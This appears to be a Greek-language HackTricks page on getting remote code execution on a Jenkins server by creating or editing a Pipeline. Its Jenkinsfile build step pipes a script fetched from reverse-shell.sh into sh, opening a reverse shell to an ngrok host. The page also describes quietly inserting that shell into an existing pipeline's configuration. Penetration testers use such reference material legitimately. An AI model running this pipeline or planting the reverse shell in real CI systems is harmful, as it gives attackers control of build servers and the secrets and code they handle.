Jenkins RCE Δημιουργία/Τροποποίηση Pipeline

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Δημιουργία νέου Pipeline

Στο “New Item” (προσβάσιμο στο /view/all/newJob) επιλέξτε Pipeline:

Στην ενότητα Pipeline γράψτε το reverse shell:

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Τέλος, κάντε κλικ στο Save και Build Now και η ροή εργασίας θα εκτελεστεί:

Τροποποίηση μιας Ροής Εργασίας

Αν μπορείτε να αποκτήσετε πρόσβαση στο αρχείο ρύθμισης της ροής εργασίας που έχει ρυθμιστεί, μπορείτε απλά να το τροποποιήσετε προσθέτοντας το reverse shell σας και στη συνέχεια να το εκτελέσετε ή να περιμένετε μέχρι να εκτελεστεί.

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks